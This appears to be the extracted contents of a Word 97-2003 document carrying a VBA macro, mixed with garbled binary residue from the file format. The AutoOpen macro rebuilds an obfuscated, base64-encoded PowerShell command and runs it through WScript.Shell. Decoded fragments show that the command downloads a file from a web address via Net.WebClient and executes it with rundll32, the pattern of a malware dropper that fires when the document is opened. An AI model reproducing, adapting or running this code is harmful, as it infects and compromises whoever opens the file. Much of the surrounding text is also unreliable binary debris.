w[_]B[_]F[_]A[_]C[_]I[_]A[_]K[_]A[_]A[_]o[_]A[_]C[_]c[_]A[_]X[_]Q[_]B[_]i[_]A[_]D[_]I[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]I[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]F[_]8[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]k[_]A[_]L[_]A[_]A[_]o[_]A[_]F[_]s[_]A[_]Y[_]Q[_]B[_]y[_]A[_]H[_]I[_]A[_]Y[_]Q[_]B[_]5[_]A[_]F[_]0[_]A[_]K[_]A[_]A[_]n[_]A[_]H[_]M[_]A[_]Z[_]A[_]A[_]n[_]A[_]C[_]w[_]A[_]J[_]w[_]B[_]z[_]A[_]H[_]c[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]w[_]A[_]K[_]A[_]A[_]n[_]A[_]G[_]g[_]A[_]d[_]A[_]A[_]n[_]A[_]C[_]
s[_]A[_]J[_]w[_]B[_]0[_]A[_]H[_]A[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]w[_]A[_]J[_]w[_]A[_]z[_]A[_]G[_]Q[_]A[_]J[_]w[_]A[_]p[_]A[_]F[_]s[_]A[_]M[_]Q[_]B[_]d[_]A[_]C[_]k[_]A[_]L[_]g[_]A[_]i[_]A[_]H[_]M[_]A[_]U[_]A[_]B[_]s[_]A[_]G[_]A[_]A[_]S[_]Q[_]B[_]0[_]A[_]C[_]I[_]A[_]K[_]A[_]A[_]k[_]A[_]F[_]Q[_]A[_]M[_]g[_]A[_]2[_]A[_]E[_]E[_]A[_]I[_]A[_]A[_]r[_]A[_]C[_]A[_]A[_]J[_]A[_]B[_]2[_]A[_]G[_]E[_]A[_]c[_]g[_]B[_]f[_]A[_]E[_]E[_]A[_]I[_]A[_]A[_]r[_]A[_]C[_]A[_]A[_]J[_]A[_]B[_]C[_]A[_]D[_]c[_]A[_]N[_]Q[_]B[_]
Q[_]A[_]C[_]k[_]A[_]O[_]w[_]A[_]k[_]A[_]F[_]c[_]A[_]N[_]w[_]A[_]x[_]A[_]F[_]Q[_]A[_]P[_]Q[_]A[_]o[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]Q[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]D[_]k[_]A[_]M[_]w[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]w[_]A[_]n[_]A[_]F[_]g[_]A[_]J[_]w[_]A[_]p[_]A[_]D[_]s[_]A[_]Z[_]g[_]B[_]v[_]A[_]H[_]I[_]A[_]Z[_]Q[_]B[_]h[_]A[_]G[_]M[_]A[_]a[_]A[_]A[_]g[_]A[_]C[_]g[_]A[_]J[_]A[_]B[_]2[_]A[_]G[_]E[_]A[_]c[_]g[_]B[_]f[_]A[_]E[_]I[_]A[_]I[_]A[_]B[_]p[_]A[_]G[_]4[_]A[_]I[_]A[_]A[_]k[_]A[_]E[_]0[_]A[_]
c[_]g[_]B[_]r[_]A[_]G[_]o[_]A[_]K[_]Q[_]B[_]7[_]A[_]H[_]Q[_]A[_]c[_]g[_]B[_]5[_]A[_]H[_]s[_]A[_]K[_]A[_]A[_]u[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]O[_]A[_]G[_]U[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]d[_]w[_]A[_]t[_]A[_]E[_]8[_]A[_]Y[_]g[_]B[_]q[_]A[_]G[_]U[_]A[_]Y[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]0[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]g[_]A[_]H[_]M[_]A[_]W[_]Q[_]B[_]z[_]A[_]H[_]Q[_]A[_]Z[_]Q[_]B[_]N[_]A[_]C[_]4[_]A[_]b[_]g[_]B[_]l[_]A[_]H[_]Q[_]A[_]L[_]g[_]B[_]X[_]A[_]E[_]U[_]A[_]Y[_]g[_]B[_]D[_]A[_]
E[_]w[_]A[_]a[_]Q[_]B[_]F[_]A[_]G[_]4[_]A[_]d[_]A[_]A[_]p[_]A[_]C[_]4[_]A[_]I[_]g[_]B[_]E[_]A[_]E[_]8[_]A[_]d[_]w[_]B[_]O[_]A[_]E[_]w[_]A[_]b[_]w[_]B[_]B[_]A[_]G[_]Q[_]A[_]Z[_]g[_]B[_]g[_]A[_]E[_]k[_]A[_]Y[_]A[_]B[_]M[_]A[_]G[_]U[_]A[_]I[_]g[_]A[_]o[_]A[_]C[_]Q[_]A[_]d[_]g[_]B[_]h[_]A[_]H[_]I[_]A[_]X[_]w[_]B[_]C[_]A[_]C[_]w[_]A[_]I[_]A[_]A[_]k[_]A[_]E[_]M[_]A[_]e[_]Q[_]B[_]n[_]A[_]D[_]A[_]A[_]a[_]w[_]B[_]1[_]A[_]D[_]c[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]R[_]w[_]A[_]3[_]A[_]D[_]U[_]A[_]U[_]Q[_]
A[_]9[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]X[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]O[_]A[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]f[_]A[_]F[_]I[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]k[_]A[_]O[_]w[_]B[_]J[_]A[_]G[_]Y[_]A[_]I[_]A[_]A[_]o[_]A[_]C[_]g[_]A[_]J[_]g[_]A[_]o[_]A[_]C[_]c[_]A[_]R[_]w[_]B[_]l[_]A[_]H[_]Q[_]A[_]L[_]Q[_]B[_]J[_]A[_]H[_]Q[_]A[_]J[_]w[_]A[_]r[_]A[_]C[_]c[_]A[_]Z[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]t[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]g[_]A[_]C[_]Q[_]A[_]Q[_]w[_]B[_]5[_]A[_]G[_]c[_]
A[_]M[_]A[_]B[_]r[_]A[_]H[_]U[_]A[_]N[_]w[_]A[_]p[_]A[_]C[_]4[_]A[_]I[_]g[_]B[_]s[_]A[_]G[_]A[_]A[_]Z[_]Q[_]B[_]u[_]A[_]G[_]c[_]A[_]d[_]A[_]B[_]o[_]A[_]C[_]I[_]A[_]I[_]A[_]A[_]t[_]A[_]G[_]c[_]A[_]Z[_]Q[_]A[_]g[_]A[_]D[_]M[_]A[_]M[_]A[_]A[_]1[_]A[_]D[_]c[_]A[_]N[_]Q[_]A[_]p[_]A[_]C[_]A[_]A[_]e[_]w[_]A[_]u[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]y[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]H[_]U[_]A[_]b[_]g[_]B[_]k[_]A[_]G[_]w[_]A[_]b[_]A[_]A[_]z[_]A[_]D[_]I[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]A[_]A[_]J[_]A[_]B[_]D[_]
A[_]H[_]k[_]A[_]Z[_]w[_]A[_]w[_]A[_]G[_]s[_]A[_]d[_]Q[_]A[_]3[_]A[_]C[_]w[_]A[_]K[_]A[_]A[_]n[_]A[_]E[_]M[_]A[_]b[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]G[_]4[_]A[_]d[_]A[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]y[_]A[_]G[_]8[_]A[_]b[_]A[_]B[_]f[_]A[_]F[_]I[_]A[_]d[_]Q[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]u[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]r[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]E[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]n[_]A[_]E[_]w[_]A[_]T[_]A[_]A[_]n[_]A[_]C[_]k[_]A[_]K[_]Q[_]A[_]u[_]A[_]C[_]I[_]A[_]V[_]
A[_]B[_]g[_]A[_]G[_]8[_]A[_]c[_]w[_]B[_]U[_]A[_]H[_]I[_]A[_]Y[_]A[_]B[_]J[_]A[_]E[_]4[_]A[_]R[_]w[_]A[_]i[_]A[_]C[_]g[_]A[_]K[_]Q[_]A[_]7[_]A[_]C[_]Q[_]A[_]Q[_]g[_]A[_]y[_]A[_]D[_]k[_]A[_]R[_]A[_]A[_]9[_]A[_]C[_]g[_]A[_]J[_]w[_]B[_]a[_]A[_]C[_]c[_]A[_]K[_]w[_]A[_]o[_]A[_]C[_]c[_]A[_]N[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]y[_]A[_]F[_]c[_]A[_]J[_]w[_]A[_]p[_]A[_]C[_]k[_]A[_]O[_]w[_]B[_]i[_]A[_]H[_]I[_]A[_]Z[_]Q[_]B[_]h[_]A[_]G[_]s[_]A[_]O[_]w[_]A[_]k[_]A[_]E[_]Y[_]A[_]M[_]g[_]A[_]2[_]A[_]E[_]
Y[_]A[_]P[_]Q[_]A[_]o[_]A[_]C[_]c[_]A[_]V[_]g[_]A[_]n[_]A[_]C[_]s[_]A[_]K[_]A[_]A[_]n[_]A[_]D[_]M[_]A[_]N[_]w[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]B[_]X[_]A[_]C[_]c[_]A[_]K[_]Q[_]A[_]p[_]A[_]H[_]0[_]A[_]f[_]Q[_]B[_]j[_]A[_]G[_]E[_]A[_]d[_]A[_]B[_]j[_]A[_]G[_]g[_]A[_]e[_]w[_]B[_]9[_]A[_]H[_]0[_]A[_]J[_]A[_]B[_]K[_]A[_]D[_]E[_]A[_]X[_]w[_]B[_]O[_]A[_]D[_]0[_]A[_]K[_]A[_]A[_]n[_]A[_]F[_]Q[_]A[_]M[_]A[_]A[_]n[_]A[_]C[_]s[_]A[_]J[_]w[_]A[_]4[_]A[_]E[_]g[_]A[_]J[_]w[_]A[_]p[_]A[_]A[_]=[_]=
WScript.Shell
Attribut
e VB_Nam
e = "New
Macros"
Sub Exec
  Dim
 payload  As S
.decoded
& "c[_]m
1?p_]
@]A[_]F
  pay@load =
 "	L
M3$.
3ea1l
]A[_]r
  payl oad =
%>LW
1r=fl
?n_B
A_]V
?z_]
 0[_]A
  payloa
H& "c
,)b%N
9l>iD
?p_]
deco
ded_7
Rep lace(
Set shel
l_object
CreateO
("WScri
pt.SA
 .Run L
End Su
 Aut
oOpen()
Exec
Word
Win16
Win32
Win64x
VBA6
VBA7
MAC_OFFICE_VERSIONHG
ARM64
Project-
stdole
Normal
Office
ThisDocument<
_Evaluate
NewMacros
Execzy
payload
decoded_payload
Replacef
shell_object
CreateObject
Run_
AutoOpen
Documentj
Project
rstd
ole>
\H{00020
430-
0046}#
2.0#0#/A
pplicati
ons/Micr
osoft Wo
rd.app/C
ontents/
Framewor
ks/OLEAuHtom
Resource
T2.tlbz#
ormal
!OffDic
{2DF8D04
C-5BFA-1
01B-BDE5
SharedSu
pport/Ty
pe Libra
@mso
* 16.0 O
ThisDocu"m@aG
AbNewM
*\DNormalrU
V8~c
Project
ThisDocument
NewMacros
Word
stdole
Office
Exec
AutoOpen
ThisDocument
NewMacros
ID="{534129C5-793E-044D-8274-DC72D61B3266}"
Document=ThisDocument/&H00000000
Module=NewMacros
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="0103A2A2A6A2A6A2A6A2A6"
DPB="BFBD1CDE64222323232323"
GC="7D7FDE9C225B235B23A4"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
NewMacros=148, 29, 931, 569, 
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Administrator
Normal.dotm
Microsoft Office Word
